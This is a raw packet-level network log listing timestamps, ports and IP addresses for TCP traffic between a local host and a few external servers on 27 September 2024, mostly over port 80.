Sep 27, 2024 04:21:16.002121925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002135038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002146959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002156019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002167940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002180099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002182007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002182007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002191067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002202034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002268076 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002311945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002355099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002365112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002377033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002401114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002401114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002410889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002422094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002432108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002445936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002445936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002460957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002475023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002489090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002523899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002629995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002643108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002654076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002665043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002688885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002763987 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.003010035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.003062963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.003072977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.003078938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.003086090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.003118038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.003118038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.003135920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.007371902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007417917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007436037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007448912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007447958 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.007462025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007473946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.007488012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007502079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.007503986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.007503986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.007523060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.007541895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.007560015 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.022785902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022805929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022816896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022829056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022839069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022850037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022859097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.022859097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.022861958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022874117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.022911072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.022911072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.024123907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024136066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024147034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024169922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024184942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024188042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.024198055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024202108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.024235964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.024249077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.024329901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024343967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.024389982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.024389982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.031913042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.031925917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.031938076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.031975985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.031986952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032001019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032001019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032012939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032025099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032037020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032064915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032094955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032608032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032619953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032639027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032650948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032660961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032669067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032702923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032704115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032704115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032713890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032731056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032742023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.032763004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.032787085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.034899950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.034912109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.034923077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.034961939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.034984112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.034987926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035001993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035012960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035024881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035039902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035060883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035115004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035121918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035135031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035146952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035157919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035168886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035181999 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035206079 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035245895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035258055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035269976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035281897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035293102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035300016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035329103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035358906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035394907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035407066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035418034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035429001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035442114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035446882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035466909 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035495996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035517931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035531044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035542011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035552979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035574913 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035605907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035659075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035671949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035685062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035696983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035707951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035710096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035721064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035736084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035753012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035775900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035808086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035820007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035832882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035845041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035878897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035900116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.035907030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035918951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.035962105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036001921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036015034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036026001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036037922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036048889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036061049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036063910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036077976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036081076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036102057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036143064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036228895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036241055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036251068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036262035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036273956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036282063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036287069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036298990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036310911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036329985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036329985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036362886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036367893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036416054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036420107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036429882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036442041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036453009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.036463976 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036494970 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.036523104 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041559935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041621923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041631937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041649103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041667938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041680098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041683912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041702986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041733980 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041821003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041832924 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041845083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041857004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041868925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041879892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041879892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041917086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041917086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041939020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.041965008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041975975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041986942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.041996956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.042005062 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.042009115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.042026997 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.042063951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.042063951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.050316095 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.052602053 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:16.057450056 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.060045004 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.060115099 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.060200930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060211897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060224056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060235023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060266018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.060266018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.060322046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.060473919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060487032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060507059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.060534954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.060534954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.060553074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.061573982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061584949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061594009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061631918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061639071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.061639071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.061642885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061655045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061671019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061685085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.061685085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.061707973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.061717987 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.061781883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066652060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066690922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066701889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066729069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066729069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066749096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066761017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066771030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066781998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066802979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066865921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066890955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066903114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066914082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066962957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066962957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066962957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.066973925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066984892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.066997051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067003012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067023993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067051888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067204952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067226887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067236900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067249060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067272902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067272902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067296982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067296982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067322016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067333937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067363024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067375898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067398071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067404032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067409992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067434072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067527056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067837000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067857027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067866087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067903996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067903996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.067928076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067939043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067949057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067960024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.067989111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068005085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068007946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068061113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068245888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068294048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068304062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068366051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068366051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068366051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068383932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068394899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068404913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068413973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068454981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068454981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068716049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068727016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068739891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068747997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068759918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068768024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068783045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068793058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.068794012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068811893 CEST	49724	80	192.168.2.5	176.113.115.95
